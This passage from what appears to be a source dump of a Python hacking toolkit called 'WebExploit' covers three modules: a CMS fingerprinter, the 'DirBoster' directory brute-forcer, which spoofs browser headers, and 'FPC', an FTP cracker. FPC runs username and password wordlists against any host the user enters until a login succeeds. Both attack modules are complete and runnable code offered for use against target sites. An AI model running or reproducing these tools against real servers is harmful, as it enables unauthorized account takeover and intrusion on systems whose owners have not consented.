56 | nefative = "\033[7m"
57 | cross = "\033[9m"
58 | ended = "\033[0m"
59 | bold = "\033[1m"
60 | nbold = "\033[0m"
61 | white = f.WHITE
62 |
63 | bnr = ['''
64 | ▄████▄ ███▄ ▄███▓ ██████
65 | ▒██▀ ▀█ ▓██▒▀█▀ ██▒ ▒██ ▒
66 | ▒▓█ ▄ ▓██ ▓██░ ░ ▓██▄
67 | ▒▓▓▄ ▄██ ▒██ ▒██ ▒ ██▒
68 | ▒ ▓███▀ ▒▒██▒ ░██▒ ▒██████▒▒
69 | ░ ░▒ ▒ ░░ ▒░ ░ ░ ▒ ▒▓▒ ▒ ░
70 | ░ ▒ ░░ ░ ░ ░ ░▒ ░
71 | ░ ░ ░ ░ ░ ░
72 | ░ ░ ░ ░ ░ ''', '''
73 | ▄▄· • ▌ ▄ ·. .▄▄ ·
74 | ▐█ ▌▪ ·██ ▐███▪ ▐█ ▀.
75 | ██ ▄▄ ▐█ ▌▐▌▐█· ▄▀▀▀█▄
76 | ▐███▌ ██ ██▌▐█▌ ▐█▄▪▐█
77 | ·▀▀▀ ▀▀ █▪▀▀▀ ▀▀▀▀ ''', '''
78 | ______ ____ ____ _______
79 | ./ ___ | |_ \ / _| / ___ |
80 | / ./ \_| | \/ | | (__ \_|
81 | | | | |\ /| | '.___\-.
82 | \ \.___.'\ _| |_\/_| |_ |\\____) |
83 | \._____.' |_____||_____| |_______.' ''']
84 |
85 | def r_bnr(bnr):
86 | return choice(bnr)
87 |
88 | print (f'{blink}{r_bnr(bnr)}{ended}', end='')
89 | t.sleep(2)
90 | print(f' {italic}From{ended} : ', end='')
91 | #create flush text [simple]
92 | print(f'{red}{bold}', end='', flush=True)
93 | print(f'{bold}W', end='', flush=True)
94 | t.sleep(0.5)
95 | print('e', end='', flush=True)
96 | t.sleep(0.7)
97 | print('b', end='', flush=True)
98 | t.sleep(0.4)
99 | print('E', end='', flush=True)
100 | t.sleep(0.1)
101 | print('x', end='', flush=True)
102 | t.sleep(0.2)
103 | print('p', end='', flush=True)
104 | t.sleep(0.3)
105 | print('l', end='', flush=True)
106 | t.sleep(0.4)
107 | print('o', end='', flush=True)
108 | t.sleep(0.5)
109 | print('i', end='', flush=True)
110 | t.sleep(1.5)
111 | print(f't{ended}', flush=True)
112 | nbold = "\033[0m" # tahe koskholi !
113 | t.sleep(1)
114 | print(f'{white}{nbold}')
115 |
116 | print (f'\n {bold}{f.GREEN}[{f.WHITE}CMS{f.GREEN}]{f.WHITE}{f.RED} C.M.S{f.WHITE}{bold} C{nbold}ontent {bold}M{nbold}anagement {bold}S{nbold}ystem Detector T00L !\n\n\n')
117 | t.sleep(3)
118 |
119 |
120 | while True:
121 | try:
122 | url = input(f' {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}C.M.S/{bold}WP-URL{nbold}{f.WHITE} enter \'{bold}URL{nbold}\' [ex: https://youtube.com]:#{f.GREEN}{bold} ')
123 | print(f'{nbold}')
124 |
125 | if url:
126 | if 'http' in url or 'https' in url:
127 | print (f' {f.WHITE}[{f.GREEN}{bold}INFO{f.WHITE}{nbold}@{f.RED}C.M.S/{f.CYAN}Skipper{f.WHITE}] SKIPPING ADD {bold}{f.GREEN} HTTP://{nbold} to [{green}{bold}{url}{nbold}]\n')
128 | t.sleep(2)
129 | break
130 | if 'http' not in url or 'https' not in url:
131 | print (f' {f.WHITE}[{f.GREEN}{bold}INFO{f.WHITE}{nbold}@{f.RED}C.M.S/{f.CYAN}Adder{white}] AUTOMATICALLY ADDING {bold}{f.GREEN} HTTP://{nbold} to [{green}{bold}{url}{nbold}]\n')
132 | url = (f'http://{url}')
133 | t.sleep(2)
134 | break
135 | else:
136 | continue
137 | except KeyboardInterrupt:
138 | print(f'\n\n {nbold}{f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}] TERMINATED BY {bold}USER{nbold} EXITTING . . .')
139 | t.sleep(2)
140 | # break
141 | sys.exit(0)
142 | try:
143 | information_url = builtwith.parse(url)
144 | except Exception as builtwith_error:
145 | print (f' {nbold}{f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}@{f.RED}C.M.S/{f.GREEN}GET-CMS-INFO{white}] {nbold}{f.CYAN} ERROR : \' {bold}{builtwith_error}{nbold} \' \n')
146 | t.sleep(3)
147 | sys.exit(0)
148 | try:
149 | for n in information_url:
150 | val = ''
151 | for mji in information_url[str(n)]:
152 | n = n.replace('-',' ')
153 | n = n.title()
154 | val += str(mji)
155 |
156 | print (f' {f.WHITE}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.CYAN}CMS/{f.WHITE}NAME >>>{bold}{f.CYAN} {n} {nbold}{f.WHITE}] {f.WHITE}~> [{f.RED}{bold}{val}{nbold}{f.WHITE}] \n')
157 | t.sleep(0.5)
158 | except Exception as information_url_error:
159 | print (f' {nbold}{f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}@{f.RED}C.M.S/{f.GREEN}CMS-INFO-URL{white}] {nbold}{f.CYAN} ERROR : \'{bold}{information_url_error}{nbold}\' \n')
160 | t.sleep(3)
161 | sys.exit(0)
162 |
--------------------------------------------------------------------------------
/cores/dirboster.py:
--------------------------------------------------------------------------------
1 | def run():
2 | '''
3 | MIT License
4 |
5 | Copyright (c) 2022 MJi | DarkƤwn [github.com/c4ssif3r]
6 |
7 | Permission is hereby granted, free of charge, to any person obtaining a copy
8 | of this software and associated documentation files (the "Software"), to deal
9 | in the Software without restriction, including without limitation the rights
10 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
11 | copies of the Software, and to permit persons to whom the Software is
12 | furnished to do so, subject to the following conditions:
13 |
14 | The above copyright notice and this permission notice shall be included in all
15 | copies or substantial portions of the Software.
16 |
17 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
18 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
19 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
20 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
21 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
22 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
23 | SOFTWARE.
24 | '''
25 | import time as t
26 | import os, sys
27 |
28 | try:
29 | from colorama import Fore as f
30 | import requests as r
31 | from fake_useragent import UserAgent
32 | agent = UserAgent()
33 | #import baner
34 | from random import choice
35 | from fake_headers import Headers
36 | except:
37 | print ('\n\033[3m please run \' pip install -r reqirements.txt \' ')
38 | sys.exit()
39 | #------------
40 | #{f.WHITE}[{f.GREEN}S{f.WHITE}]
41 | bold = "\033[1m"
42 | nbold = "\033[0m"
43 | italic = "\033[3m"
44 | red = "\033[0;31m"
45 | # {bold}
46 | # {nbold}
47 | print(f'{bold}')
48 | print (f'''\033[5m
49 | ░▒█▀▀▄░░▀░░█▀▀▄░▒█▀▀▄░▄▀▀▄░█▀▀░▀█▀░█▀▀░█▀▀▄
50 | ░▒█░▒█░░█▀░█▄▄▀░▒█▀▀▄░█░░█░▀▀▄░░█░░█▀▀░█▄▄▀
51 | ░▒█▄▄█░▀▀▀░▀░▀▀░▒█▄▄█░░▀▀░░▀▀▀░░▀░░▀▀▀░▀░▀▀ {nbold}''', end='')
52 | print(f'{italic}From{nbold} : ', end='')
53 | #create flush text [simple]
54 | print(f'{red}{bold}', end='', flush=True)
55 | print(f'{bold}W', end='', flush=True)
56 | t.sleep(0.5)
57 | print('e', end='', flush=True)
58 | t.sleep(0.7)
59 | print('b', end='', flush=True)
60 | t.sleep(0.4)
61 | print('E', end='', flush=True)
62 | t.sleep(0.1)
63 | print('x', end='', flush=True)
64 | t.sleep(0.2)
65 | print('p', end='', flush=True)
66 | t.sleep(0.3)
67 | print('l', end='', flush=True)
68 | t.sleep(0.4)
69 | print('o', end='', flush=True)
70 | t.sleep(0.5)
71 | print('i', end='', flush=True)
72 | t.sleep(1.5)
73 | print(f't{nbold}', flush=True)
74 |
75 | t.sleep(1)
76 |
77 | print (f'\n {bold}{f.GREEN}[{f.WHITE}DIRBOSTER{f.GREEN}]{f.WHITE} {f.RED}DirBoster{f.WHITE}{nbold} advanced tool for find directory AND files in your {bold}TARGET SITE{nbold} !\n\n\n')
78 | t.sleep(3)
79 | print (f'\n {f.WHITE}[{f.YELLOW}WARNING{f.WHITE}] enter URL patch file\n')
80 | t.sleep(1)
81 | print (f' {f.WHITE}[{f.YELLOW}WARNING{f.WHITE}] Enter URL\'s without [/] \n')
82 | t.sleep(1.5)
83 | print (f' {f.WHITE}[{f.BLUE}{bold}EXAMPLE{nbold}{f.WHITE}] test.com/{f.RED}{bold}etc{nbold}{f.WHITE} [etc => YourPatch]\n')
84 | t.sleep(2)
85 | print (f' {f.WHITE}[{f.YELLOW}WARNING{f.WHITE}] Enter For using {bold}DEFAULT PATCH{nbold} FILE \n')
86 | dirss = input(f' {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}DirBoster/{bold}DIRFILE{nbold}{f.WHITE} enter \'DIR\' file for BruteForce[.txt]:#{f.GREEN}{bold} ')
87 | print('')
88 | t.sleep(1)
89 | # print (f' {f.WHITE}{nbold}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}DirBoster/{bold}SET{nbold}{f.WHITE}] {f.CYAN}DirFile{f.WHITE} >>> {bold}{dirs}{nbold}\n')
90 |
91 | #dirs = open(dirs, 'r').read().split()
92 |
93 | try:
94 | dirs = open(dirss, 'r').read().split()
95 | print (f' {f.WHITE}[{f.GREEN}{bold}WebExploit{nbold}{f.WHITE}@{nbold}{f.RED}DirBoster/{f.WHITE}{bold}LOAD-LENGHT{nbold}{f.WHITE}] LOADED {bold} %s {nbold} DirPaths {bold}Successfully...{nbold}\n' % len(dirs))
96 | print (f' {f.WHITE}{nbold}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}DirBoster/{bold}SET{nbold}{f.WHITE}] {f.CYAN}DirFile{f.WHITE} >>> {bold}{dirss}{nbold}\n')
97 | t.sleep(1)
98 |
99 | except FileNotFoundError:
100 | filedefault = (f'{os.getcwd()}/cores/wp-plugins.txt')
101 | dirs = open(filedefault, 'r').read().split()
102 | print (f'\n {f.WHITE}[{f.RED}{bold}ERROR{nbold}{f.WHITE}]{f.YELLOW} You Not Entered {bold}DirPaths{f.WHITE}{nbold}[{bold}{f.YELLOW}FILE{nbold}{f.WHITE}] USING {bold}{f.GREEN}DEFAULT FILE !{nbold}{f.WHITE}\n')
103 | print (f' {f.WHITE}[{f.GREEN}{bold}WebExploit{nbold}{f.WHITE}@{nbold}{f.RED}DirBoster/{f.WHITE}LOAD-{bold}DEFAULT{nbold}{f.WHITE}] LOADED {bold} %s {nbold} DirPaths {bold}Successfully...{nbold}\n\n' % len(dirs))
104 | t.sleep(1)
105 |
106 | url = input(f' {f.WHITE}[{f.CYAN}{bold}WebExploit{nbold}{f.WHITE}@{f.RED}DirBoster/{bold}URL{nbold}{f.WHITE}] Enter URL With [http://, https://]:#{f.GREEN}{bold} ')
107 | print(f'{nbold}')
108 | t.sleep(0.5)
109 | #print (f' {f.WHITE}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}DirBoster/{bold}URL{nbold}{f.WHITE}]{f.WHITE} >>> {bold}{url}{nbold}\n')
110 |
111 | if len(url) <= 5:
112 | while True:
113 | try:
114 | print(f'\n {f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}] PLZ ENTER A {bold}URL{nbold} !')
115 | print(f'\n {f.WHITE}[{f.RED}{bold}WARNING{f.WHITE}{bold}]CTRL+C{nbold} For Abort !\n')
116 | url = input(f' {f.WHITE}[{f.CYAN}{bold}WebExploit{nbold}{f.RED}/DirBoster/{bold}URL{nbold}{f.WHITE}] Enter URL With [http://, https://]:#{f.GREEN}{bold} ')
117 | print('')
118 | if len(url) <= 5:
119 | continue
120 | else:
121 | break
122 | except KeyboardInterrupt:
123 | print(f'\n\n {f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}] TERMINATED BY {bold}USER{nbold} EXITTING . . .')
124 | t.sleep(2)
125 | sys.exit(0)
126 |
127 | if 'https://' not in url:
128 | if 'http://' not in url:
129 | print(f'\n {f.WHITE}[{f.YELLOW}{bold}WARNING{f.WHITE}{nbold}] YOU NOT ENTERED URL WITH HTTP:// OR HTTPS:// {bold}{f.CYAN}WebExploit{nbold}{f.WHITE} ADDING {bold}AUTOMATICALLY{nbold} HTTP:// TO {url} !\n')
130 | url = (f'http://{url}')
131 | #print (f' {f.WHITE}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}DirBoster/{bold}URL{nbold}{f.WHITE}]{f.WHITE} >>> {bold}{url}{nbold}\n\n')
132 |
133 | else:
134 | pass
135 | if url[-1:] == '/':
136 | pass
137 | else:
138 | url = (f'{url}/')
139 |
140 | print (f' {f.WHITE}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}DirBoster/{bold}URL{nbold}{f.WHITE}]{f.WHITE} >>> {bold}{url}{nbold}\n')
141 |
142 | slep = input(f' {f.WHITE}[{f.CYAN}{bold}WebExploit{nbold}{f.RED}/DirBoster/{bold}SLEEP{nbold}{f.WHITE}] Enter Delay Time [Default is 3 Sec !]:#{f.GREEN}{bold} ')
143 | print('\n')
144 |
145 | if '.' in slep:
146 | print (f' {f.WHITE}[{f.YELLOW}WARNING{f.WHITE}] YOU CAN\'T USING Float\'s in DelayTime ! \n')
147 | print (f' {f.WHITE}[{f.YELLOW}{bold}SET-DEFAULT{f.WHITE}{nbold}] USING Default SLEEP TIME (3 sec) \n')
148 | slep = 3
149 | else:
150 | pass
151 |
152 | try:
153 | slep = int(slep)
154 | t.sleep(int(slep))
155 | except TypeError:
156 | print (f' {f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}] type {slep} not int ! \n')
157 | print (f' {f.WHITE}[{f.YELLOW}{bold}SET-DEFAULT{f.WHITE}{nbold}] USING Default SLEEP TIME (3 sec) \n')
158 | slep = 3
159 |
160 | finally:
161 | print (f' {f.WHITE}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}DirBoster/{bold}SLEEP{nbold}{f.WHITE}]{f.WHITE} >>> {bold}{slep}{nbold}\n\n')
162 |
163 | bw_ = ['chrome','firefox','opera']
164 | os_ = ['win','mac','lin']
165 | TF = ['True','False']
166 |
167 | print (f' {f.WHITE}[{f.GREEN}INFO{nbold}{f.WHITE}] Fake {bold}{f.CYAN}HTTP Header{nbold}{f.WHITE} Crated ! \n')
168 | t.sleep(3.5)
169 | print (f' {f.WHITE}[{f.GREEN}{bold}INFO{nbold}{f.WHITE}] {bold}DIRBOSTER{nbold} LAUNCH ATTACK . . . \n')
170 |
171 | print (f' {f.WHITE}[{f.GREEN}INFO{nbold}{f.WHITE}] sleeping 5 sec after attack ! \n')
172 |
173 | t.sleep(5)
174 | # start ?
175 | print (f' {f.WHITE}[{f.GREEN}{bold}WEB-EXPLOIT{nbold}{f.WHITE}] ATTACK :\ <\STARTED>! :\\ \n')
176 | for dir in dirs:
177 | t.sleep(slep)
178 | browser = choice(bw_)
179 | operation_system = choice(os_)
180 | T_F = choice(TF)
181 |
182 | headers = Headers(
183 | browser=browser,
184 | os=operation_system,
185 | headers=T_F).generate()
186 |
187 | #headers = {'User-Agent': agent.random}
188 |
189 | # make request
190 | finally_url = (url+dir)
191 | #for debug :
192 | #print (finally_url)
193 | try:
194 | Result = r.get(finally_url, headers=headers)
195 | except Exception as err:
196 | print (f'\n {f.WHITE}[{f.RED}{bold}ERROR{nbold}{f.WHITE}]{f.YELLOW} HAVE {err} ERROR ! IN URL {f.WHITE}~> [{f.RED}{bold}{finally_url}{nbold}{f.WHITE}] \n')
197 | continue
198 | if Result.status_code == 200 or Result.status_code in range(0,299):
199 | print (f' {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}DirBoster/{f.WHITE}STATUS-{bold}{f.GREEN}{Result.status_code}{nbold}{f.WHITE}] FOUNDED {f.WHITE}~> [{f.GREEN}{bold}{finally_url}{nbold}{f.WHITE}] \n')
200 | #elif ?
201 | if Result.status_code == 404:
202 | print (f' {f.WHITE}[{f.YELLOW}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}DirBoster/{f.WHITE}STATUS-{f.YELLOW}{bold}{Result.status_code}{nbold}{f.WHITE}] NOT FOUND {f.WHITE}~> [{f.RED}{bold}{finally_url}{nbold}{f.WHITE}] \n')
203 | #elif ?
204 | if Result.status_code == 403:
205 | print (f' {f.WHITE}[{f.RED}{bold}WebExploit{f.WHITE}{nbold}@{f.CYAN}DirBoster/{f.WHITE}STATUS-{bold}{f.RED}{Result.status_code}{nbold}{f.WHITE}]{f.RED} FORBIDDEN {f.WHITE}~> [{f.RED}{bold}{finally_url}{nbold}{f.WHITE}] \n')
206 | #elif ?
207 | if Result.status_code in range(499,600):
208 | print (f' {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}DirBoster/{f.WHITE}STATUS-{f.YELLOW}{Result.status_code}{nbold}{f.WHITE}]{f.RED} SERVER ERROR {f.WHITE}~> [{f.YELLOW}{finally_url}{nbold}{f.WHITE}] \n')
209 |
210 | if Result.status_code == 301 or Result.status_code == 302:
211 | print (f' {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}DirBoster/{f.WHITE}STATUS-{f.YELLOW}{Result.status_code}{nbold}{f.WHITE}]{f.CYAN} REDIRECT {f.WHITE}~> [{f.YELLOW}{finally_url}{nbold}{f.WHITE}] \n')
212 |
213 | else:
214 | pass
215 | #print (f' {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}DirBoster/{f.WHITE}STATUS-{f.YELLOW}{Result.status_code}{nbold}{f.WHITE}]{f.RED} CAN\'T VERIFY {f.WHITE}~> [{f.YELLOW}{finally_url}{nbold}{f.WHITE}] \n')
216 |
217 |
218 | # DirBoster a tool from WebExploit
219 |
220 | #dirboster()
221 |
--------------------------------------------------------------------------------
/cores/fpc.py:
--------------------------------------------------------------------------------
1 | def run():
2 | '''
3 | MIT License
4 |
5 | Copyright (c) 2022 MJi | DarkƤwn [github.com/c4ssif3r]
6 |
7 | Permission is hereby granted, free of charge, to any person obtaining a copy
8 | of this software and associated documentation files (the "Software"), to deal
9 | in the Software without restriction, including without limitation the rights
10 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
11 | copies of the Software, and to permit persons to whom the Software is
12 | furnished to do so, subject to the following conditions:
13 |
14 | The above copyright notice and this permission notice shall be included in all
15 | copies or substantial portions of the Software.
16 |
17 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
18 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
19 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
20 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
21 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
22 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
23 | SOFTWARE.
24 | '''
25 |
26 | try:
27 | import time as t
28 | from colorama import Fore as f
29 | import sys, os
30 | from ftplib import FTP
31 | import ftplib
32 | from random import choice
33 | except:
34 | print("\033[0;31m please run command \033[0;32m pip install -r requirements.txt !")
35 | t.sleep(1)
36 | sys.exit()
37 |
38 | black = "\033[0;30m"
39 | red = "\033[0;31m"
40 | green = "\033[0;32m"
41 | brown = "\033[0;33m"
42 | blue = "\033[0;34m"
43 | purple = "\033[0;35m"
44 | cyan = "\033[0;36m"
45 | l_gray = "\033[0;37m"
46 | dark_gray = "\033[1;30m"
47 | l_red = "\033[1;31m"
48 | l_green = "\033[1;32m"
49 | yellow = "\033[1;33m"
50 | l_blue = "\033[1;34m"
51 | l_purple = "\033[1;35m"
52 | l_cyan = "\033[1;36m"
53 | l_white = "\033[1;37m"
54 | faint = "\033[2m"
55 | italic = "\033[3m"
56 | underline = "\033[4m"
57 | blink = "\033[5m"
58 | nefative = "\033[7m"
59 | cross = "\033[9m"
60 | ended = "\033[0m"
61 | bold = "\033[1m"
62 | nbold = "\033[0m"
63 | white = f.WHITE
64 |
65 | bnr = ['''
66 | )`-.--. /`-. )\.-.
67 | ) .-._( / _ \ / .-._)
68 | \ `-._ ( '-' ( ( . _
69 | ) ._( ) .._.' ) '..' )
70 | ( \ ( ' ( . (
71 | )./ )/ )/'._.' ''', '''
72 | ______ __ ___
73 | (_) | /|/ \ /\__)
74 | |__ |___/ |
75 | /| _| |
76 | (_/ | \___/ ''','''
77 | █████ ██▓███ ▄████▄
78 | ▓██ ▓██░ ██ ▒██▀ ▀█
79 | ▒████ ▓██░ ██▓▒ ▒▓█ ▄
80 | ░▓█▒ ▒██▄█▓▒ ▒ ▒▓▓▄ ▄██
81 | ▒░▒█░ ▒██▒ ░ ░ ▒ ▓███▀
82 | ░ ▒ ░ ▒▓▒░ ░ ░ ░ ░▒ ▒
83 | ░ ░ ░▒ ░ ░ ▒
84 | ░ ░ ░░ ░
85 | ░ ░ ░ ''']
86 |
87 | def r_bnr(bnr):
88 | return choice(bnr)
89 |
90 | print (f'{blink}{r_bnr(bnr)}{ended}', end='')
91 | t.sleep(2)
92 | print(f' {italic}From{ended} : ', end='')
93 | #create flush text [simple]
94 | print(f'{red}{bold}', end='', flush=True)
95 | print(f'{bold}W', end='', flush=True)
96 | t.sleep(0.5)
97 | print('e', end='', flush=True)
98 | t.sleep(0.7)
99 | print('b', end='', flush=True)
100 | t.sleep(0.4)
101 | print('E', end='', flush=True)
102 | t.sleep(0.1)
103 | print('x', end='', flush=True)
104 | t.sleep(0.2)
105 | print('p', end='', flush=True)
106 | t.sleep(0.3)
107 | print('l', end='', flush=True)
108 | t.sleep(0.4)
109 | print('o', end='', flush=True)
110 | t.sleep(0.5)
111 | print('i', end='', flush=True)
112 | t.sleep(1.5)
113 | print(f't{ended}', flush=True)
114 | nbold = "\033[0m" # tahe koskholi !
115 | t.sleep(1)
116 | print(f'{white}{nbold}')
117 |
118 | print (f'\n {bold}{f.GREEN}[{f.WHITE}FPC{f.GREEN}]{f.WHITE}{f.RED} F.P.C {f.WHITE}{bold}F{nbold}T{bold}P C{nbold}racker T00L !\n\n\n')
119 | t.sleep(3)
120 |
121 | while True:
122 | try:
123 | host = input(f'\n {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}F.P.C/{bold}HOST{nbold}{f.WHITE} enter {bold}\'IP or HOST ADDR{nbold}\' [ex: 1.1.1.1, ftp.site.com]:#{f.GREEN}{bold} ')
124 | print(f'{nbold}')
125 |
126 | if host:
127 | break
128 | else:
129 | continue
130 |
131 | except KeyboardInterrupt:
132 | print(f'\n\n {nbold}{f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}] TERMINATED BY {bold}USER{nbold} EXITTING . . .')
133 | t.sleep(2)
134 | # break
135 | sys.exit(0)
136 | try:
137 | ftp = FTP(host)
138 | except ftplib.all_errors as ftp_error:
139 | print (f'\n {nbold}{f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}@{f.RED}F.P.C/{f.GREEN}Modules-Loader{white}] {nbold}{f.CYAN} ERROR : \'{bold}{ftp_error}{nbold}\' \n')
140 | sys.exit(0)
141 | t.sleep(1)
142 | print(f'\n {f.WHITE}[{f.GREEN}{bold}INFO{f.WHITE}{nbold}@{f.RED}F.P.C/{bold}FTP-CRACKER{nbold}{f.YELLOW} If You Know {bold}USERNAME {nbold}Give A File With 1 Username !{white}]')
143 | t.sleep(3)
144 |
145 | while True:
146 | usernames = input(f'\n {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}F.P.C/{bold}FTP-CRACKER{nbold}{f.WHITE} enter \'USERNAME LIST{nbold}\' [ex: FTP-users.txt]:#{f.GREEN}{bold} ')
147 | if usernames:
148 | try:
149 | users = open(usernames, 'r').read().split()
150 | # users.close()
151 | break
152 | except Exception as file_err:
153 | print (f'\n {nbold}{f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}@{f.RED}F.P.C/{f.GREEN}Usernames{white}] {nbold}{f.CYAN} ERROR : \'{bold}{file_err}{nbold}\' \n')
154 | t.sleep(1)
155 | continue
156 | t.sleep(1)
157 |
158 |
159 | while True:
160 | passwords = input(f'\n {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}F.P.C/{bold}FTP-CRACKER{nbold}{f.WHITE} enter \'Password LIST{nbold}\' [ex: /home/WebExploit/Desktop/FTP-passwords.txt]:#{f.GREEN}{bold} ')
161 | if passwords:
162 | try:
163 | passes = open(passwords, 'r').read().split()
164 | # passes.close()
165 | break
166 | except Exception as file_err:
167 | print (f'\n {nbold}{f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}@{f.RED}F.P.C/{f.GREEN}Passwords{white}] {nbold}{f.CYAN} ERROR : \'{bold}{file_err}{nbold}\' \n')
168 | t.sleep(1)
169 | continue
170 | t.sleep(1)
171 |
172 | print(f'\n {f.WHITE}[{f.GREEN}{bold}INFO{f.WHITE}{nbold}@{f.RED}F.P.C/{bold}FTP-CRACKER{nbold}{f.YELLOW} Loadind modules {bold}FTP-cracker . . . !{nbold}]')
173 | t.sleep(3)
174 |
175 | try:
176 | ftp = FTP(host)
177 | except ftplib.all_errors as ftp_error:
178 | print (f'\n {nbold}{f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}@{f.RED}F.P.C/{f.GREEN}Modules-Loader{white}] {nbold}{f.CYAN} ERROR : \'{bold}{ftp_error}{nbold}\' \n')
179 | sys.exit()
180 |
181 | print(f'\n {f.WHITE}[{f.GREEN}{bold}INFO{f.WHITE}{nbold}@{f.RED}F.P.C/{bold}FTP-CRACKER/{nbold}{f.GREEN}ATTACK{bold} launching ATTACK in{white}]', end='', flush=True)
182 | t.sleep(1)
183 | print (' 5 ', end='', flush=True)
184 | t.sleep(1)
185 | print (' 4 ', end='', flush=True)
186 | t.sleep(1)
187 | print (' 3 ', end='', flush=True)
188 | t.sleep(1)
189 | print (' 2 ', end='', flush=True)
190 | t.sleep(1)
191 | print (' 1 ', end='', flush=True)
192 | t.sleep(1)
193 | print (' 0 ', end='', flush=True)
194 |
195 | t.sleep(3)
196 | print(f'\n\n\ {f.WHITE}[{f.GREEN}{bold}INFO{f.WHITE}{nbold}@{f.RED}F.P.C/{bold}FTP-CRACKER/{nbold}{f.YELLOW}ATTACK{green}{bold} LAUNCHED . . .{white}]\n')
197 | try:
198 | for username in users:
199 | for password in passes:
200 | try:
201 | log = ftp.login(username,password)
202 | # if 'OK' in log:
203 | print(f'\n {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}F.P.C/{bold}{green}INFO{nbold}{f.WHITE} User: {bold}{green}\'{username}{nbold}{white}\' Passowrd: {bold} \'{green}{password}{nbold}{white}\' {bold}{green} SUCESSFULL !')
204 | t.sleep(1)
205 | print(f'\n {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}F.P.C/{bold}{green}INFO{nbold}{f.WHITE} server response msg: {bold}{green}[{log}]')
206 | break
207 | sys.exit(0)
208 |
209 | except ftplib.all_errors as FTP_error:
210 | print(f'\n {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}F.P.C/{bold}{green}INFO{nbold}{f.WHITE} User: {bold}{red}\'{username}{nbold}{white}\' Passowrd: {bold} \'{red}{password}{nbold}{white}\' {bold}{red} Not SUCESSFULL ! {nbold}{white} Because: {yellow}{bold}{FTP_error}')
211 | continue
212 | except KeyboardInterrupt:
213 | print(f'\n\n {nbold}{f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}] TERMINATED BY {bold}USER{nbold} EXITTING . . .')
214 | t.sleep(2)
215 |
216 |
--------------------------------------------------------------------------------
/cores/history:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/cores/ipl.py:
--------------------------------------------------------------------------------
1 | def run():
2 | '''
3 | MIT License
4 |
5 | Copyright (c) 2022 MJi | DarkƤwn [github.com/c4ssif3r]
6 |
7 | Permission is hereby granted, free of charge, to any person obtaining a copy
8 | of this software and associated documentation files (the "Software"), to deal
9 | in the Software without restriction, including without limitation the rights
10 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
11 | copies of the Software, and to permit persons to whom the Software is
12 | furnished to do so, subject to the following conditions:
13 |
14 | The above copyright notice and this permission notice shall be included in all
15 | copies or substantial portions of the Software.
16 |
17 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
18 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
19 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
20 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
